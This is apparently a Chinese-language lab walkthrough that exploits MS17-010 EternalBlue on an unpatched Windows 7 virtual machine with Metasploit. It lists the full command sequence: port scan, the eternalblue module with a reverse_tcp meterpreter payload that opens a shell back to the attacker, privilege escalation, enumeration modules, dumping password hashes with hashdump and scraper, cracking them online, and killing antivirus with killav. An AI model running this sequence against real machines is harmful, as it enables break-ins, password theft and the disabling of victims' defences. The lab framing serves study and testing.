申明
本文章僅供學習使用
環境準備:
win7虛擬機(靶機)
ip:192.168.56.134
kali虛擬機(攻擊機)
ip:172.18.20.164
要求:win7虛擬機不要開防火牆,開放445端口,沒有打永恆之藍的補丁
實驗開始:
先用nmap掃描一下靶機開了哪幾個端口:
nmap -Sv -p 1-1000 192.168.56.134
跑了兩分鐘,發現win7着實開了445端口。接下來直接打開msfconsole來進行攻擊。
打開msfconsole會隨機跳出圖案,每一次打開都不一樣。
接下來使用exploit/windows/smb/ms17_010_eternalblue
模塊進行攻擊即可。
如果忘了模塊名問題也不大,直接搜索漏洞名字ms17-010
即可:
search ms17-010
根據後面的等級(rank)來進行選擇即可。這裏使用exploit/windows/smb/ms17_010_eternalblue
模塊哈,命令如下:
use exploit/windows/smb/ms17_010_eternalblue
使用show options
命令查看我們需要設置啥參數:
首先,Required
參數爲no
的,設置或者不設置都行。但是參數爲yes
的必須設置。看了一下,只有RHOSTS
(靶機ip)需要設置。
我這邊由於端口4444已經被佔用了,於是設置爲1234。
設置參數:
set rhosts 192.168.56.134
set lport 1234
這裏命令對大小寫不敏感,隨意。
參數設置完畢,在攻擊之前設置一下payload:
set payload windows/x64/meterpreter/reverse_tcp
可以用run
命令或者exploit
命令運行:
看到meterpreter >
就意味着已經攻下啦!接下來就是提權並且進行後滲透信息收集,這裏做一些簡單的介紹。
getuid
當前用戶的名字,這裏直接拿到了system權限
getsystem
不是system權限時,可以用這個命令拿到system權限(大多數情況下執行不通,需要利用漏洞進行提權,提權命令還是這個)
run post/windows/gather/forensics/enum_drives
檢查磁盤情況
其實我是沒有D盤的,這裏指的是我有個D的驅動器(我也不知道爲啥有驅動器)
run post/windows/gather/checkvm
檢查是否爲虛擬機
run post/windows/gather/enum_services
列出當前所有服務
run post/windows/gather/enum_applications
列出應用,並且想將詳細信息寫在下面那個路徑之下,可以cat一下查看:
run post/windows/gather/dumplinks
列出最近的操作(我的虛擬機剛裝,所以沒啥操作,不然能列一大串)
run post/windows/gather/enum_patches
列出所有補丁
以上方法複雜,費時。利用run scraper
命令,執行一個腳本,自動將所有你想收集的信息收集一遍,然後存儲/root/.msf4/logs/scripts/scraper/下,具體命名爲靶機ip+當前日期:
基本上你想要的信息都在這裏了:
cat hashes.txt
這裏存放着所有用戶的密碼的哈希值,存放格式爲LM : NTLM
格式,可以利用撞庫進行破解。其他的文件有興趣的自己查看哈~·
run post/windows/gather/hashdump
跟msf內置的庫進行對比,對上了就呈現出來,對不上就呈現哈希值:
我的密碼比較簡單,直接就給我跑出來了,打個碼哈~
跑不出來的哈希值可以去www.cmd5.com
去破解,簡單的直接出來,難的需要付費,一毛錢。
run killav
關掉殺毒軟件
run post/windows/manage/killava
同上
命令有很多,我整理的就辣麼一點,喜歡的點贊關注收藏一波哈,希望能幫到你們~